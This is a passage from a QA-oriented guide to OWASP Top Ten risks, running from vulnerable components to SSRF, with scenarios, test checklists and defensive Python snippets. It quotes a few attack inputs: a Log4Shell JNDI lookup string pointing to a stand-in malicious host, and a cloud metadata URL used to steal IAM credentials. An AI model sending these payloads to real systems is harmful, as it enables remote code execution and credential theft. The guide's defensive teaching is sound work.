- Scenario: An internal microservice still runs Log4j 2.14.1. Attackers send a chat message containing ${jndi:ldap://malicious.com/a}; Log4j fetches and executes remote bytecode.

- Impact: Lateral movement compromises the Kubernetes cluster; crypto‑mining containers spawn across 100 nodes, burning $30 k in cloud credits in two days.

- Lesson: Enforce dependency scanning (OWASP Dependency‑Check, Snyk), maintain an SBOM, and patch within 24 hours of critical CVE release.

QA Testing Focus – Gatekeep the Supply Chain

- Integrate OWASP Dependency‑Check in CI.

- Block builds if high‑severity CVEs are detected.

- Retest core workflows after each library upgrade.
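
To show the idea behind a build gate, here is a minimal sketch that compares installed versions against a minimum-safe table. The table is a hypothetical policy written for this example; real scanners such as OWASP Dependency-Check consult vulnerability databases rather than a hand-maintained dictionary, and the simple parser only handles purely numeric dotted versions.

```python
def parse_version(text: str) -> tuple[int, ...]:
    """Turn '2.14.1' into (2, 14, 1) so versions compare numerically."""
    return tuple(int(part) for part in text.split("."))


# Hypothetical policy table: component name -> lowest version the team accepts.
MINIMUM_SAFE = {"log4j-core": "2.17.1"}


def find_outdated(installed: dict[str, str], minimum_safe: dict[str, str]) -> list[str]:
    """List every installed component that is below its minimum accepted version."""
    findings = []
    for name, version in sorted(installed.items()):
        floor = minimum_safe.get(name)
        if floor is not None and parse_version(version) < parse_version(floor):
            findings.append(f"{name} {version} < {floor}")
    return findings


findings = find_outdated({"log4j-core": "2.14.1"}, MINIMUM_SAFE)
print(findings)  # ['log4j-core 2.14.1 < 2.17.1']
# A CI step could fail the build whenever the list is non-empty.
```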

Prevention Strategies

- Maintain an Inventory: Track all components and their versions.

- Automate Scans: Use tools like OWASP Dependency Check or retire.js.

- Subscribe to Alerts: Monitor CVE and NVD databases for vulnerabilities.

- Remove Unused Components: Eliminate unnecessary libraries or services.

- Use Trusted Sources: Download components from official, signed repositories.

- Monitor Lifecycle: Replace unmaintained components with supported alternatives.

Identification and Authentication Failures

What are Identification and Authentication Failures?

These vulnerabilities occur when authentication or session management mechanisms are weak, allowing attackers to steal accounts, bypass authentication, or hijack sessions.

Common Causes

- Credential Stuffing: Allowing automated login attempts with stolen credentials.

- Weak Passwords: Permitting default or easily guessable passwords.

- No MFA: Lack of multi-factor authentication.

- Session ID Exposure: Including session IDs in URLs.

- Poor Session Management: Reusing session IDs or not invalidating sessions.

Real‑World Exploit Example – Session Token in URL

- Scenario: A legacy e‑commerce flow appends JSESSIONID to URLs so bookmarking still works. Search‑engine crawlers log the links; attackers scrape access.log and reuse valid sessions.

- Impact: 205 premium accounts hijacked, loyalty points redeemed for gift cards.

- Lesson: Store session IDs in secure, HTTP‑only cookies; disable URL rewriting; rotate tokens on login, privilege change, and logout.

QA Testing Focus – Stress‑Test the Auth Layer

- Launch brute‑force scripts to ensure rate limiting and lockouts.

- Check that MFA is mandatory for admins.

- Verify session IDs rotate on privilege change and logout.

Prevention Strategies

- Enable MFA: Require multi-factor authentication for sensitive actions.

- Enforce Strong Passwords: Block weak passwords using deny lists.

- Limit Login Attempts: Add delays or rate limits to prevent brute-force attacks.

- Use Secure Session Management: Generate random session IDs and invalidate sessions after logout.

- Log Suspicious Activity: Monitor and alert on unusual login patterns.
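
The login-attempt limit and random session IDs described above might look like the following sketch. The `LoginThrottle` class, its thresholds, and the in-memory storage are assumptions for illustration; a production system would normally keep this state in a shared store and combine it with MFA.

```python
import secrets
import time


class LoginThrottle:
    """Lock an account after too many failed logins inside a time window."""

    def __init__(self, max_attempts: int = 5, window_seconds: float = 300.0,
                 clock=time.monotonic):
        self.max_attempts = max_attempts
        self.window_seconds = window_seconds
        self._clock = clock  # injectable so tests can control time
        self._failures: dict[str, list[float]] = {}

    def record_failure(self, username: str) -> None:
        self._failures.setdefault(username, []).append(self._clock())

    def record_success(self, username: str) -> None:
        self._failures.pop(username, None)

    def is_locked(self, username: str) -> bool:
        now = self._clock()
        # Keep only the failures that are still inside the window.
        recent = [t for t in self._failures.get(username, [])
                  if now - t < self.window_seconds]
        self._failures[username] = recent
        return len(recent) >= self.max_attempts


def new_session_id() -> str:
    """Generate an unpredictable session ID; issue a fresh one on login and privilege change."""
    return secrets.token_urlsafe(32)
```

A brute-force test can then assert that the sixth attempt within five minutes is refused and that the ID returned after login differs from the pre-login one.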

Software and Data Integrity Failures

What are Software and Data Integrity Failures?

These occur when applications trust unverified code, data, or updates, allowing attackers to inject malicious code via insecure CI/CD pipelines or dependencies.

Common Causes

- Untrusted Sources: Using unsigned updates or libraries.

- Insecure CI/CD Pipelines: Poor access controls or lack of segregation.

- Unvalidated Serialized Data: Accepting manipulated data from clients.

Real‑World Exploit Example – Poisoned NPM Dependency

- Scenario: A developer adds a third-party npm package that secretly posts process.env to a pastebin during the build. No integrity hash or package signature is checked.

- Impact: Production JWT signing key leaks; attackers mint tokens and access customer PII.

- Lesson: Run npm installs with the --ignore-scripts option, mandate Sigstore or Subresource Integrity (SRI), and run static analysis on transitive dependencies.

QA Testing Focus – Validate Build Integrity

- Confirm SHA‑256/Sigstore verification of artifacts.

- Ensure pipeline credentials use least privilege and are rotated.

- Simulate rollback to known‑good releases.
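
The SHA-256 check in this list can be sketched with the Python standard library. The function names are illustrative, and the sketch assumes the expected digest is published through a trusted channel separate from the artifact itself; signature verification with Sigstore is a separate step that is not shown here.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of the data as lowercase hex."""
    return hashlib.sha256(data).hexdigest()


def artifact_matches(data: bytes, expected_hex: str) -> bool:
    """Compare the computed digest with the published one in constant time."""
    return hmac.compare_digest(sha256_hex(data), expected_hex.strip().lower())


artifact = b"release-1.0 contents"
published = sha256_hex(artifact)  # stands in for a digest from the release notes

print(artifact_matches(artifact, published))                # True
print(artifact_matches(artifact + b" tampered", published))  # False
```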

Prevention Strategies

- Use Digital Signatures: Verify the integrity of updates and code.

- Vet Repositories: Source libraries from trusted, secure repositories.

- Secure CI/CD: Enforce access controls and audit logs.

- Scan Dependencies: Use tools like OWASP Dependency Check.

- Review Changes: Implement strict code and configuration reviews.

Security Logging and Monitoring Failures

What are Security Logging and Monitoring Failures?

These occur when applications fail to log, monitor, or respond to security events, delaying breach detection.

Common Causes

- No Logging: Failing to record critical events like logins or access failures.

- Incomplete Logs: Missing context like IPs or timestamps.

- Local-Only Logs: Storing logs without centralized, secure storage.

- No Alerts: Lack of notifications for suspicious activity.

Real‑World Exploit Example – Silent SQLi in Production

- Scenario: The booking API swallows DB errors and returns a generic “Oops.” Attackers iterate blind SQLi, dumping the schema over weeks without detection. Fraud only surfaces when the payment processor flags unusual card‑not‑present spikes.

- Impact: 140 k cards compromised; regulator imposes $1.2 M fine.

- Lesson: Log all auth, DB, and application errors with unique IDs; forward to a SIEM with anomaly detection; test alerting playbooks quarterly.

QA Testing Focus – Prove You Can Detect and Respond

- Trigger failed logins and verify entries hit the SIEM.

- Check logs include IP, timestamp, user ID, and action.

- Validate alerts escalate within agreed SLAs.

Prevention Strategies

- Log Critical Events: Capture logins, failures, and sensitive actions.

- Use Proper Formats: Ensure logs are compatible with tools like ELK Stack.

- Sanitize Logs: Prevent log injection attacks.

- Enable Audit Trails: Use tamper-proof logs for sensitive actions.

- Implement Alerts: Set thresholds for incident escalation.

- Store Logs Securely: Retain logs for forensic analysis.
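
As a rough sketch of the first three strategies, the function below emits one JSON object per security event. The field names and the function itself are assumptions chosen to match the context listed earlier (IP, timestamp, user ID, action); JSON is used because it is easy for log pipelines to parse and because encoding escapes line breaks in attacker-supplied values.

```python
import json
from datetime import datetime, timezone
from typing import Optional


def security_event(action: str, user_id: str, ip: str, outcome: str,
                   timestamp: Optional[datetime] = None) -> str:
    """Build a single-line JSON log entry for a security-relevant event."""
    when = timestamp or datetime.now(timezone.utc)
    record = {
        "timestamp": when.isoformat(),
        "ip": ip,
        "user_id": user_id,
        "action": action,
        "outcome": outcome,
    }
    # json.dumps escapes CR/LF inside string values, so injected text
    # cannot start a forged second log line.
    return json.dumps(record)


# The user ID below contains a newline, as a log-injection attempt might.
line = security_event("login_failed", "alice\nadmin login_ok", "203.0.113.7", "denied")
print(line)
```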

Server-Side Request Forgery (SSRF)

What is SSRF?

SSRF occurs when an application fetches a user-supplied URL without validation, allowing attackers to send unauthorized requests to internal systems.

Common Causes

- Unvalidated URLs: Accepting raw user input for server-side requests.

- Lack of Segmentation: Internal and external requests share the same network.

- HTTP Redirects: Allowing unverified redirects in fetches.

Real‑World Exploit Example – Metadata IP Hit

- Scenario: An image‑proxy microservice fetches URLs supplied by users. An attacker requests http://169.254.169.254/latest/meta-data/iam/security-credentials/. The service dutifully returns IAM temporary credentials.

- Impact: With the stolen keys, attackers snapshot production RDS instances and exfiltrate them to another region.

- Lesson: Add an allow‑list of outbound domains, block internal IP ranges at the network layer, and use SSRF‑mitigating libraries.

QA Testing Focus – Pen‑Test the Fetch Function

- Attempt requests to internal IP ranges and cloud metadata endpoints.

- Confirm only allow‑listed schemes (https) and domains are permitted.

- Validate outbound traffic rules at the firewall.

Prevention Strategies

- Validate URLs: Use allow lists for scheme, host, and port.

- Segment Networks: Isolate internal services from public access.

- Disable Redirects: Block HTTP redirects in server-side fetches.

- Monitor Firewalls: Log and analyse firewall activity.

- Avoid Metadata Exposure: Protect endpoints like 169.254.169.254.
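
A minimal sketch of the URL validation described above, using only the Python standard library. The allow-listed host images.example.com and both function names are hypothetical. Checking the URL string alone is not sufficient: the address the host name resolves to should also be checked, for example with the second helper, and redirects should stay disabled in the HTTP client.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"https"}
ALLOWED_HOSTS = {"images.example.com"}  # hypothetical allow list
ALLOWED_PORTS = {None, 443}             # None means the scheme's default port


def is_fetch_allowed(url: str) -> bool:
    """Allow a server-side fetch only for allow-listed scheme, host, and port."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError for malformed ports
    except ValueError:
        return False
    if parts.scheme not in ALLOWED_SCHEMES:
        return False
    if port not in ALLOWED_PORTS:
        return False
    return parts.hostname in ALLOWED_HOSTS


def is_internal_address(address: str) -> bool:
    """Flag private, loopback, and link-local IPs such as 169.254.169.254."""
    ip = ipaddress.ip_address(address)
    return ip.is_private or ip.is_loopback or ip.is_link_local


print(is_fetch_allowed("http://169.254.169.254/latest/meta-data/iam/security-credentials/"))  # False
print(is_fetch_allowed("https://images.example.com/logo.png"))  # True
print(is_internal_address("169.254.169.254"))                   # True
```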

Conclusion

The OWASP Top Ten highlights the most critical web application security risks, from broken access control to SSRF. For QA professionals, understanding these vulnerabilities is essential to ensuring secure software. By incorporating robust testing strategies, such as automated scans, penetration testing, and configuration audits, QA teams can identify and mitigate these risks early in the development lifecycle. To excel in this domain, QA professionals should stay updated on evolving threats, leverage tools like Burp Suite, OWASP ZAP, and Nessus, and advocate for secure development practices. By mastering the OWASP Top Ten, you can position yourself as a valuable asset in delivering secure, high-quality web applications.

Frequently Asked Questions

Why should QA testers care about OWASP vulnerabilities?

QA testers play a vital role in identifying potential security flaws before an application reaches production. Familiarity with OWASP vulnerabilities helps testers validate secure development practices and reduce the risk of exploits.

How often is the OWASP Top 10 updated?